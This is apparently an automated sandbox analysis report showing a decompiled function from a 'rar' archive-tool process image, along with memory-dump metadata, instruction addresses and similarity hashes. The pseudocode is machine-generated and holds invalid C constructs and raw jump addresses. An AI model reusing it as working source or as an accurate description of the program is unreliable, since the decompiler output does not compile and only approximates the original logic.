                                                                                                            0x7ff650b66ae3
                                                                                                            0x7ff650b66ae6
                                                                                                            0x7ff650b66aea
                                                                                                            0x7ff650b66aee
                                                                                                            0x7ff650b66af2
                                                                                                            0x7ff650b66af5
                                                                                                            0x7ff650b66b11
                                                                                                            0x7ff650b66b1d
                                                                                                            0x7ff650b66b20
                                                                                                            0x7ff650b66b26
                                                                                                            0x7ff650b66b28
                                                                                                            0x7ff650b66b2c
                                                                                                            0x7ff650b66b2e
                                                                                                            0x7ff650b66b31
                                                                                                            0x7ff650b66b37
                                                                                                            0x7ff650b66b3a
                                                                                                            0x7ff650b66b3e
                                                                                                            0x7ff650b66b42
                                                                                                            0x7ff650b66b48
                                                                                                            0x7ff650b66b4b
                                                                                                            0x7ff650b66b52
                                                                                                            0x7ff650b66b54
                                                                                                            0x7ff650b66b86
                                                                                                            0x7ff650b66b8c
                                                                                                            0x7ff650b66b92
                                                                                                            0x7ff650b66b98
                                                                                                            0x7ff650b66b9a
                                                                                                            0x7ff650b66ba5
                                                                                                            0x7ff650b66bab
                                                                                                            0x7ff650b66bb0
                                                                                                            0x7ff650b66bc7

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 19b424bd2f52ebd9a5c98abcf0732f403d6bf2234b39f07daca115a75a4af4bd
                                                                                                            • Instruction ID: 282a8fe44420cbf7a0610258984b49f536097c696ad1ade676ab0cfe0a43b806
                                                                                                            • Opcode Fuzzy Hash: 19b424bd2f52ebd9a5c98abcf0732f403d6bf2234b39f07daca115a75a4af4bd
                                                                                                            • Instruction Fuzzy Hash: 7B3226B26185929BD328CF29C494BBC3BA1F796748F088235DB5B87B88DB3DD555CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B514FC Relevance: .5, Instructions: 544COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 55%
                                                                                                            			E00007FF67FF650B514FC(intOrPtr __ebx, void* __ecx, void* __edx, void* __eflags, void* __rax, long long __rbx, long long __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed short _t280;
				signed int _t318;
				intOrPtr _t333;
				signed int _t339;
				intOrPtr _t401;
				signed char _t412;
				unsigned int _t415;
				void* _t425;
				signed int _t427;
				signed int _t428;
				void* _t436;
				intOrPtr _t438;
				signed long long _t459;
				signed long long _t460;
				signed int _t467;
				signed char* _t469;
				intOrPtr _t490;
				intOrPtr* _t494;
				intOrPtr* _t506;
				void* _t526;
				long long _t527;
				void* _t531;
				signed long long _t548;
				intOrPtr* _t564;
				void* _t568;
				intOrPtr* _t569;
				void* _t571;
				signed char* _t574;
				void* _t579;
				void* _t580;
				void* _t582;
				signed long long _t583;
				void* _t589;
				void* _t593;
				void* _t597;
				signed long long _t603;
				intOrPtr* _t604;
				signed long long _t606;
				void* _t608;
				intOrPtr* _t609;
				void* _t611;

				_t602 = __r11;
				_t601 = __r10;
				_t593 = __r9;
				_t585 = __r8;
				_t544 = __rdx;
				_t333 = __ebx;
				 *((long long*)(_t582 + 8)) = __rbx;
				_t2 = _t582 - 0xfd0; // -2128
				_t580 = _t2;
				E00007FF67FF650B69CB0(0x10d0, __rax, __r10, __r11);
				_t583 = _t582 - __rax;
				_t459 =  *0x50b978f0; // 0x27db226282f1
				_t460 = _t459 ^ _t583;
				 *(_t580 + 0xfc0) = _t460;
				_t494 = __r8;
				_t569 = __rdx;
				 *((long long*)(_t583 + 0x50)) = __rcx;
				E00007FF67FF650B320B8(__r8, __rdx, _t571, _t611);
				 *(_t583 + 0x78) = _t460;
				r14d = 0;
				 *((intOrPtr*)(_t583 + 0x40)) = r14b;
				if (E00007FF67FF650B18E38(0, __r8, _t569, _t608) == 0) goto 0x50b515b9;
				 *((char*)(_t583 + 0x40)) = 1;
				 *((char*)(_t494 + 0x7f7d)) =  *((intOrPtr*)(_t569 + 0x7f7d));
				 *((char*)(_t494 + 0x7f7c)) =  *((intOrPtr*)(_t569 + 0x7f7c));
				 *((char*)(_t494 + 0x7f7f)) =  *((intOrPtr*)(_t569 + 0x7f7f));
				 *((char*)(_t494 + 0x7f83)) =  *((intOrPtr*)(_t569 + 0x7f83));
				 *((char*)(_t494 + 0x7f84)) =  *((intOrPtr*)(_t569 + 0x7f84));
				 *((char*)(_t494 + 0x7f81)) =  *((intOrPtr*)(_t569 + 0x7f81));
				 *((char*)(_t494 + 0x7f82)) =  *((intOrPtr*)(_t569 + 0x7f82));
				 *(_t494 + 0x34b8) = r14d;
				 *((intOrPtr*)(_t494 + 0x34b4)) = r14w;
				 *((intOrPtr*)(_t583 + 0x20)) = r14b;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(0, _t460, _t494, _t544, _t585, _t601, _t602);
				 *((intOrPtr*)(_t583 + 0x20)) = r14b;
				r9d = 0;
				r8d = 0;
				_t26 = _t593 + 1; // 0x1
				E00007FF67FF650B1B4D8(_t26, _t460, _t494, _t544, _t585, _t601, _t602);
				r8d = 0;
				 *0x50b80550(_t571, _t579);
				r8d =  *(_t494 + 0x34ac);
				r8d = r8d - 0xd;
				E00007FF67FF650B31D58( *((intOrPtr*)( *_t569 + 0x20)), _t494, _t569, _t494, _t580, _t585);
				r8d = 0;
				 *0x50b80550();
				_t31 = _t580 - 0x80; // -2256
				E00007FF67FF650B17370( *((intOrPtr*)( *_t569 + 0x20)), _t31);
				_t548 =  *((intOrPtr*)(_t580 - 0x80));
				 *0x50b80550();
				_t467 =  *((intOrPtr*)(_t580 - 0x78)) - 0x1000;
				 *(_t583 + 0x58) = _t467;
				 *(_t583 + 0x68) = _t467;
				r12d = r14d;
				 *(_t583 + 0x4c) = r14d;
				r13d = r14d;
				 *(_t583 + 0x44) = r14d;
				_t40 = _t494 + 0x3518; // -25352
				_t609 = _t40;
				_t506 = _t609;
				E00007FF67FF650B36990(_t494, _t506, _t548,  *((intOrPtr*)(_t580 - 0x78)),  *((intOrPtr*)(_t580 - 0x78)));
				_t427 = r14d + 1;
				 *(_t583 + 0x64) = _t427;
				if ((_t427 & 0x000fffff) != 0) goto 0x50b516bc;
				E00007FF67FF650B5B008();
				_t574 = _t548 +  *((intOrPtr*)(_t580 - 0x80));
				_t469 =  &(_t574[2]);
				 *(_t583 + 0x70) = _t469;
				r8d =  *_t469 & 0x000000ff;
				 *(_t494 + 0x351c) = r8d;
				_t401 = ((_t574[6] & 0x000000ff) << 8) + (_t574[5] & 0x000000ff);
				 *((intOrPtr*)(_t494 + 0x3524)) = _t401;
				_t339 = ((_t574[0x1b] & 0x000000ff) << 8) + (_t574[0x1a] & 0x000000ff);
				 *(_t583 + 0x60) = _t339;
				if (r8d != 0x74) goto 0x50b51c14;
				if (_t401 - 0x1000 >= 0) goto 0x50b51c14;
				if (_t506 - 1 - 0x7fe > 0) goto 0x50b51c14;
				r13d = _t339;
				_t436 = _t606 - 0x800;
				if (_t436 >= 0) goto 0x50b51c0f;
				 *_t609 = ((_t574[1] & 0x000000ff) << 8) + ( *_t574 & 0x000000ff);
				 *(_t494 + 0x3520) = ((_t574[4] & 0x000000ff) << 8) + (_t574[3] & 0x000000ff);
				 *((intOrPtr*)(_t494 + 0x352c)) = ((((_t574[0xa] & 0x000000ff) << 8) + (_t574[9] & 0x000000ff) << 8) + (_t574[8] & 0x000000ff) << 8) + (_t574[7] & 0x000000ff);
				r12d = _t574[0xe] & 0x000000ff;
				 *((char*)(_t583 + 0x48)) = _t574[0xd];
				 *((char*)(_t583 + 0x49)) = _t574[0xc];
				 *((char*)(_t583 + 0x4a)) = _t574[0xb];
				 *((char*)(_t494 + 0x3530)) = _t574[0xf];
				 *((intOrPtr*)(_t494 + 0x4598)) = 2;
				 *((intOrPtr*)(_t494 + 0x459c)) = ((((_t574[0x13] & 0x000000ff) << 8) + (_t574[0x12] & 0x000000ff) << 8) + (_t574[0x11] & 0x000000ff) << 8) + (_t574[0x10] & 0x000000ff);
				_t89 = _t494 + 0x4568; // -21176
				E00007FF67FF650B5BA28(((((_t574[0x17] & 0x000000ff) << 8) + (_t574[0x16] & 0x000000ff) << 8) + (_t574[0x15] & 0x000000ff) << 8) + (_t574[0x14] & 0x000000ff));
				 *(_t494 + 0x3534) = _t574[0x18] & 0x000000ff;
				 *((char*)(_t494 + 0x3538)) = _t574[0x19];
				 *((intOrPtr*)(_t494 + 0x353c)) = ((((_t574[0x1f] & 0x000000ff) << 8) + (_t574[0x1e] & 0x000000ff) << 8) + (_t574[0x1d] & 0x000000ff) << 8) + (_t574[0x1c] & 0x000000ff);
				r8d =  *(_t494 + 0x3520);
				r8d = r8d & 0x00000100;
				if (_t436 == 0) goto 0x50b51896;
				 *(_t494 + 0x4580) =  &(_t469[_t469 + (_t469 + (_t469 + (_t89 << 8) << 8) << 8)]);
				 *((long long*)(_t494 + 0x4588)) = (_t469 + (_t469 + (_t603 << 8) << 8) << 8) + (_t469 + (_t469 + (_t469 + (_t548 << 8) << 8) << 8) << 0x20) + _t469;
				r8d =  ~r8d;
				asm("dec eax");
				E00007FF67FF650B6BAF0();
				_t115 = _t494 + 0x3540; // -25312
				_t604 = _t115;
				if (( *(_t494 + 0x3520) & 0x00000200) == 0) goto 0x50b5195f;
				_t119 = _t580 - 0x58; // -2216
				E00007FF67FF650B2C2F0(_t469, _t119);
				_t120 = _t580 - 0x40; // -2192
				_t589 = (_t606 | 0xffffffff) + 1;
				_t438 =  *((intOrPtr*)(_t120 + _t589));
				if (_t438 != 0) goto 0x50b51921;
				_t122 = _t580 - 0x3f; // -2191
				_t597 = _t122 + _t589;
				 *((long long*)(_t583 + 0x30)) = 0x800;
				 *((long long*)(_t583 + 0x28)) = _t604;
				 *((long long*)(_t583 + 0x20)) = _t606 - _t589 - 1;
				_t126 = _t580 - 0x40; // -2192
				_t127 = _t580 - 0x58; // -2216
				_t526 = _t127;
				E00007FF67FF650B2C338(_t494, _t526, _t126, _t589, _t597, _t601);
				r10d = 0;
				goto 0x50b51967;
				r10d = 0;
				 *_t604 = r10w;
				_t412 =  *(_t494 + 0x3520);
				r9d = _t412;
				r8d = _t412;
				r8d = r8d & 0x00000100;
				r9d = r9d & 0x00000400;
				if (_t438 == 0) goto 0x50b519a0;
				asm("dec eax");
				_t527 =  *((intOrPtr*)(_t526 + 0x20 + _t606 + _t574));
				 *((long long*)(_t494 + 0x45c9)) = _t527;
				if ( *((intOrPtr*)(_t494 + 0x3524)) - 2 <= 0) goto 0x50b51bef;
				_t428 =  *(_t583 + 0x60);
				if ((_t412 & 0x00000008) == 0) goto 0x50b519d3;
				r8d =  ~r8d;
				asm("sbb ecx, ecx");
				_t277 =  ==  ? 0x20 : _t527 + 8;
				_t278 = ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe;
				_t279 = ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428;
				_t590 = ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428;
				_t280 = E00007FF67FF650B28538(_t333, 0xffffffff, _t526 + 0x20 + _t606, _t494, _t527,  *(_t583 + 0x70), _t569, _t574, ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428);
				if ( *(_t494 + 0x3534) - 0xf - 0x19 > 0) goto 0x50b51c05;
				if ( *((intOrPtr*)(_t494 + 0x3538)) - 0x30 - 8 > 0) goto 0x50b51c05;
				if ( *((char*)(_t494 + 0x3530)) - 0x20 > 0) goto 0x50b51c05;
				if (( !_t280 & 0x0000ffff) !=  *_t609) goto 0x50b51c05;
				r8d = 0;
				 *0x50b80550();
				 *((char*)(_t580 + _t606 - 0x40)) = 0;
				E00007FF67FF650B5B008();
				r9d = 0;
				if ( *_t604 != r9w) goto 0x50b51a8e;
				_t145 = _t580 - 0x40; // -2192
				E00007FF67FF650B44CC0(1,  *((intOrPtr*)( *_t569 + 0x20)), _t494, _t145, _t606, _t603);
				r13d = 0x800;
				r8d = r13d;
				_t146 = _t580 + 0x7c0; // 0xfc0
				_t147 = _t580 - 0x40; // 0x7c0
				E00007FF67FF650B59EEC(_t333,  *((intOrPtr*)( *_t569 + 0x20)), _t494, _t147, _t146, ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428);
				r8d = r13d;
				_t148 = _t580 + 0x7c0; // 0xfc0
				_t531 = _t148;
				E00007FF67FF650B5D098(_t333, _t494, _t531, _t604, _t574, ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428, _t568);
				r9d = 0;
				r8d =  *(_t494 + 0x3520);
				asm("btr eax, 0xc");
				r13d =  *(_t583 + 0x44);
				r13d = r13d | r8d;
				 *(_t583 + 0x44) = r13d;
				_t290 =  ==  ? (r8d & 0x00000100 | 0x00000400) >> 5 : _t531 + 8;
				_t291 = ( ==  ? (r8d & 0x00000100 | 0x00000400) >> 5 : _t531 + 8) + _t428;
				 *((intOrPtr*)(_t494 + 0x3524)) = ( ==  ? (r8d & 0x00000100 | 0x00000400) >> 5 : _t531 + 8) + _t428;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t583 + 0x50)) + 0x7157)) != r9b) goto 0x50b51aeb;
				E00007FF67FF650B111C0(0x73, _t604);
				r9d = 0;
				r12d =  *(_t583 + 0x4c);
				r10d = 1;
				r12d = r12d + r10d;
				 *(_t583 + 0x4c) = r12d;
				_t415 =  *(_t609 + 8);
				 *(_t609 + 0x10) = _t415 >> 0x0000000e & r10b;
				 *((char*)(_t609 + 0x10a8)) = 1;
				 *((char*)(_t609 + 0x10a9)) = 1;
				 *((char*)(_t609 + 0x10ab)) = 1;
				 *((char*)(_t609 + 0x10b0)) = 1;
				 *((char*)(_t609 + 0x1100)) = 1;
				r8d = 0xe0;
				 *((char*)(_t609 + 0x1101)) = 1;
				if ((_t415 & r8d) != r8d) goto 0x50b51b74;
				r8d = r9d;
				goto 0x50b51b85;
				r8d = 0x10000;
				r8d = r8d << (_t415 >> 0x00000005 & 0x00000007);
				 *((long long*)(_t609 + 0x1108)) = r8d;
				 *((char*)(_t609 + 0x1102)) = 1;
				 *((char*)(_t609 + 0x1103)) = 1;
				 *(_t609 + 0x1111) = _t415 >> 0x00000008 & r10b;
				 *((char*)(_t609 + 0x20)) =  *((char*)(_t609 + 0x20)) + 0xd0;
				 *((intOrPtr*)(_t583 + 0x20)) = r9b;
				r9d = 0;
				r8d = 0;
				_t177 = _t597 + 2; // 0x2
				E00007FF67FF650B1B4D8(_t177, r8d, _t494, _t604, ( ==  ? 0x20 : _t527 + 8) + 0xfffffffe + _t428, _t601, _t602);
				_t564 = _t494;
				_t318 = E00007FF67FF650B31D58(r8d, _t494, _t569, _t564, _t580,  *(_t494 + 0x4580));
				goto 0x50b51c19;
				r13d =  *(_t583 + 0x44);
				r12d =  *(_t583 + 0x4c);
				goto 0x50b51c1c;
				r12d =  *(_t583 + 0x4c);
				r13d =  *(_t583 + 0x44);
				r10d = 0;
				if (_t608 + 1 -  *(_t583 + 0x78) + 0xffffffe0 >= 0) goto 0x50b51c8b;
				if (_t564 != 0) goto 0x50b516a4;
				r8d = 0;
				 *0x50b80550();
				 *0x50b80550();
				 *(_t583 + 0x68) =  *(_t583 + 0x68) + 0xfffff000 +  *((intOrPtr*)(_t580 - 0x78));
				goto 0x50b5169f;
				if ((r13b & 0x00000003) == 0) goto 0x50b51c98;
				 *((char*)(_t494 + 0x7f7d)) = 1;
				if (r12d == 0) goto 0x50b51d11;
				if ( *((intOrPtr*)(_t583 + 0x40)) != r10b) goto 0x50b51cbd;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t583 + 0x50)) + 0x71ac)) != r10b) goto 0x50b51cbd;
				E00007FF67FF650B5CE9C(_t318 %  *(_t583 + 0x58), _t425,  *((intOrPtr*)( *((intOrPtr*)(_t583 + 0x50)) + 0x71ac)) - r10b,  *(_t583 + 0x68) + 0xfffff000 +  *((intOrPtr*)(_t580 - 0x78)), _t494, _t569, _t569,  *((intOrPtr*)(_t583 + 0x50)),  *(_t583 + 0x58));
				if (1 == 0) goto 0x50b51cbd;
				 *((char*)(_t494 + 0x7f7c)) = 1;
				r8d = 0;
				_t490 =  *((intOrPtr*)( *_t494 + 0x20));
				 *0x50b80550();
				 *((char*)(_t583 + 0x20)) = 1;
				r9d = 0;
				r8d = 0;
				E00007FF67FF650B1B4D8(0, _t490, _t494,  *((intOrPtr*)(_t580 - 0x80)),  *((intOrPtr*)(_t580 - 0x78)), _t601, _t602);
				 *((char*)(_t583 + 0x20)) = 0;
				r9d = 0;
				r8d = 0;
				_t211 = _t490 + 1; // 0x1
				E00007FF67FF650B1B4D8(_t211, _t490, _t494,  *((intOrPtr*)(_t580 - 0x80)),  *((intOrPtr*)(_t580 - 0x78)), _t601, _t602);
				 *0x50b80550();
				goto 0x50b51d31;
				E00007FF67FF650B2CC24(E00007FF67FF650B111C0(0x41, _t569 + 0x3a), 0xa, 1, 0x50ba7ab8);
				_t214 = _t580 - 0x80; // -2256
				return E00007FF67FF650B69D10(E00007FF67FF650B11534(_t214), 0x41,  *(_t580 + 0xfc0) ^ _t583);
			}















































                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b514fc
                                                                                                            0x7ff650b5150c
                                                                                                            0x7ff650b5150c
                                                                                                            0x7ff650b51519
                                                                                                            0x7ff650b5151e
                                                                                                            0x7ff650b51521
                                                                                                            0x7ff650b51528
                                                                                                            0x7ff650b5152b
                                                                                                            0x7ff650b51532
                                                                                                            0x7ff650b51535
                                                                                                            0x7ff650b51538
                                                                                                            0x7ff650b51540
                                                                                                            0x7ff650b51545
                                                                                                            0x7ff650b5154a
                                                                                                            0x7ff650b5154d
                                                                                                            0x7ff650b5155e
                                                                                                            0x7ff650b51560
                                                                                                            0x7ff650b5156b
                                                                                                            0x7ff650b51577
                                                                                                            0x7ff650b51583
                                                                                                            0x7ff650b5158f
                                                                                                            0x7ff650b5159b
                                                                                                            0x7ff650b515a7
                                                                                                            0x7ff650b515b3
                                                                                                            0x7ff650b515b9
                                                                                                            0x7ff650b515c0
                                                                                                            0x7ff650b515c8
                                                                                                            0x7ff650b515cd
                                                                                                            0x7ff650b515d0
                                                                                                            0x7ff650b515d8
                                                                                                            0x7ff650b515dd
                                                                                                            0x7ff650b515e2
                                                                                                            0x7ff650b515e5
                                                                                                            0x7ff650b515e8
                                                                                                            0x7ff650b515ef
                                                                                                            0x7ff650b51602
                                                                                                            0x7ff650b5160c
                                                                                                            0x7ff650b51612
                                                                                                            0x7ff650b51619
                                                                                                            0x7ff650b51623
                                                                                                            0x7ff650b5162b
                                                                                                            0x7ff650b51637
                                                                                                            0x7ff650b51642
                                                                                                            0x7ff650b51646
                                                                                                            0x7ff650b51659
                                                                                                            0x7ff650b51664
                                                                                                            0x7ff650b5166a
                                                                                                            0x7ff650b51671
                                                                                                            0x7ff650b51676
                                                                                                            0x7ff650b5167e
                                                                                                            0x7ff650b51681
                                                                                                            0x7ff650b51686
                                                                                                            0x7ff650b51689
                                                                                                            0x7ff650b5168e
                                                                                                            0x7ff650b5168e
                                                                                                            0x7ff650b51697
                                                                                                            0x7ff650b5169a
                                                                                                            0x7ff650b516a4
                                                                                                            0x7ff650b516a6
                                                                                                            0x7ff650b516b0
                                                                                                            0x7ff650b516b2
                                                                                                            0x7ff650b516c7
                                                                                                            0x7ff650b516cb
                                                                                                            0x7ff650b516cf
                                                                                                            0x7ff650b516d4
                                                                                                            0x7ff650b516d8
                                                                                                            0x7ff650b516ea
                                                                                                            0x7ff650b516ec
                                                                                                            0x7ff650b516fd
                                                                                                            0x7ff650b516ff
                                                                                                            0x7ff650b51707
                                                                                                            0x7ff650b51713
                                                                                                            0x7ff650b51721
                                                                                                            0x7ff650b51727
                                                                                                            0x7ff650b5172a
                                                                                                            0x7ff650b51731
                                                                                                            0x7ff650b51743
                                                                                                            0x7ff650b51753
                                                                                                            0x7ff650b51778
                                                                                                            0x7ff650b5177e
                                                                                                            0x7ff650b51786
                                                                                                            0x7ff650b5178d
                                                                                                            0x7ff650b51794
                                                                                                            0x7ff650b5179b
                                                                                                            0x7ff650b517a1
                                                                                                            0x7ff650b517ca
                                                                                                            0x7ff650b517ef
                                                                                                            0x7ff650b517f6
                                                                                                            0x7ff650b517ff
                                                                                                            0x7ff650b51808
                                                                                                            0x7ff650b5182d
                                                                                                            0x7ff650b51833
                                                                                                            0x7ff650b5183a
                                                                                                            0x7ff650b5184a
                                                                                                            0x7ff650b518a3
                                                                                                            0x7ff650b518d8
                                                                                                            0x7ff650b518df
                                                                                                            0x7ff650b518e2
                                                                                                            0x7ff650b518f6
                                                                                                            0x7ff650b518fb
                                                                                                            0x7ff650b518fb
                                                                                                            0x7ff650b5190c
                                                                                                            0x7ff650b5190e
                                                                                                            0x7ff650b51912
                                                                                                            0x7ff650b51917
                                                                                                            0x7ff650b51921
                                                                                                            0x7ff650b51924
                                                                                                            0x7ff650b51928
                                                                                                            0x7ff650b51933
                                                                                                            0x7ff650b51937
                                                                                                            0x7ff650b5193a
                                                                                                            0x7ff650b51943
                                                                                                            0x7ff650b51948
                                                                                                            0x7ff650b5194d
                                                                                                            0x7ff650b51951
                                                                                                            0x7ff650b51951
                                                                                                            0x7ff650b51955
                                                                                                            0x7ff650b5195a
                                                                                                            0x7ff650b5195d
                                                                                                            0x7ff650b5195f
                                                                                                            0x7ff650b51962
                                                                                                            0x7ff650b51967
                                                                                                            0x7ff650b5196d
                                                                                                            0x7ff650b51970
                                                                                                            0x7ff650b51973
                                                                                                            0x7ff650b5197a
                                                                                                            0x7ff650b51981
                                                                                                            0x7ff650b51988
                                                                                                            0x7ff650b51995
                                                                                                            0x7ff650b51999
                                                                                                            0x7ff650b519ab
                                                                                                            0x7ff650b519b1
                                                                                                            0x7ff650b519b8
                                                                                                            0x7ff650b519ba
                                                                                                            0x7ff650b519bd
                                                                                                            0x7ff650b519cb
                                                                                                            0x7ff650b519ce
                                                                                                            0x7ff650b519d1
                                                                                                            0x7ff650b519d3
                                                                                                            0x7ff650b519de
                                                                                                            0x7ff650b519f2
                                                                                                            0x7ff650b51a04
                                                                                                            0x7ff650b51a11
                                                                                                            0x7ff650b51a1d
                                                                                                            0x7ff650b51a2f
                                                                                                            0x7ff650b51a39
                                                                                                            0x7ff650b51a41
                                                                                                            0x7ff650b51a46
                                                                                                            0x7ff650b51a4b
                                                                                                            0x7ff650b51a53
                                                                                                            0x7ff650b51a57
                                                                                                            0x7ff650b51a5b
                                                                                                            0x7ff650b51a60
                                                                                                            0x7ff650b51a66
                                                                                                            0x7ff650b51a69
                                                                                                            0x7ff650b51a70
                                                                                                            0x7ff650b51a74
                                                                                                            0x7ff650b51a79
                                                                                                            0x7ff650b51a7f
                                                                                                            0x7ff650b51a7f
                                                                                                            0x7ff650b51a86
                                                                                                            0x7ff650b51a8b
                                                                                                            0x7ff650b51a8e
                                                                                                            0x7ff650b51a98
                                                                                                            0x7ff650b51a9c
                                                                                                            0x7ff650b51aa1
                                                                                                            0x7ff650b51aa4
                                                                                                            0x7ff650b51ac2
                                                                                                            0x7ff650b51ac5
                                                                                                            0x7ff650b51ac7
                                                                                                            0x7ff650b51ad9
                                                                                                            0x7ff650b51ae3
                                                                                                            0x7ff650b51ae8
                                                                                                            0x7ff650b51aeb
                                                                                                            0x7ff650b51af0
                                                                                                            0x7ff650b51af6
                                                                                                            0x7ff650b51af9
                                                                                                            0x7ff650b51afe
                                                                                                            0x7ff650b51b0a
                                                                                                            0x7ff650b51b13
                                                                                                            0x7ff650b51b21
                                                                                                            0x7ff650b51b30
                                                                                                            0x7ff650b51b3f
                                                                                                            0x7ff650b51b4e
                                                                                                            0x7ff650b51b57
                                                                                                            0x7ff650b51b66
                                                                                                            0x7ff650b51b6d
                                                                                                            0x7ff650b51b6f
                                                                                                            0x7ff650b51b72
                                                                                                            0x7ff650b51b7c
                                                                                                            0x7ff650b51b82
                                                                                                            0x7ff650b51b88
                                                                                                            0x7ff650b51b97
                                                                                                            0x7ff650b51ba6
                                                                                                            0x7ff650b51bb3
                                                                                                            0x7ff650b51bba
                                                                                                            0x7ff650b51bbf
                                                                                                            0x7ff650b51bc4
                                                                                                            0x7ff650b51bc7
                                                                                                            0x7ff650b51bca
                                                                                                            0x7ff650b51bd1
                                                                                                            0x7ff650b51bdd
                                                                                                            0x7ff650b51be3
                                                                                                            0x7ff650b51bed
                                                                                                            0x7ff650b51bef
                                                                                                            0x7ff650b51bf4
                                                                                                            0x7ff650b51c03
                                                                                                            0x7ff650b51c0a
                                                                                                            0x7ff650b51c0f
                                                                                                            0x7ff650b51c19
                                                                                                            0x7ff650b51c2b
                                                                                                            0x7ff650b51c3c
                                                                                                            0x7ff650b51c45
                                                                                                            0x7ff650b51c54
                                                                                                            0x7ff650b51c6c
                                                                                                            0x7ff650b51c81
                                                                                                            0x7ff650b51c86
                                                                                                            0x7ff650b51c8f
                                                                                                            0x7ff650b51c91
                                                                                                            0x7ff650b51c9b
                                                                                                            0x7ff650b51ca2
                                                                                                            0x7ff650b51cab
                                                                                                            0x7ff650b51cad
                                                                                                            0x7ff650b51cb4
                                                                                                            0x7ff650b51cb6
                                                                                                            0x7ff650b51cc0
                                                                                                            0x7ff650b51cc8
                                                                                                            0x7ff650b51ccc
                                                                                                            0x7ff650b51cd4
                                                                                                            0x7ff650b51cd8
                                                                                                            0x7ff650b51cdb
                                                                                                            0x7ff650b51ce3
                                                                                                            0x7ff650b51cea
                                                                                                            0x7ff650b51cee
                                                                                                            0x7ff650b51cf1
                                                                                                            0x7ff650b51cf4
                                                                                                            0x7ff650b51cfa
                                                                                                            0x7ff650b51d09
                                                                                                            0x7ff650b51d0f
                                                                                                            0x7ff650b51d2b
                                                                                                            0x7ff650b51d31
                                                                                                            0x7ff650b51d63

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$BuffByteMultiSleepWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2643493361-0
                                                                                                            • Opcode ID: e99edbb117555178ee432492b38560aec39af781712f84ffb650866ab2ad0103
                                                                                                            • Instruction ID: d221c2926a3fd36c204d112cef2b4b5ac26d5ec5530c6d81096d546d6b56eb19
                                                                                                            • Opcode Fuzzy Hash: e99edbb117555178ee432492b38560aec39af781712f84ffb650866ab2ad0103
                                                                                                            • Instruction Fuzzy Hash: AC321863A185D24AD729CB39D4502BD7FA0EB86788F0C4175DB9E97B96DE3DD100CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

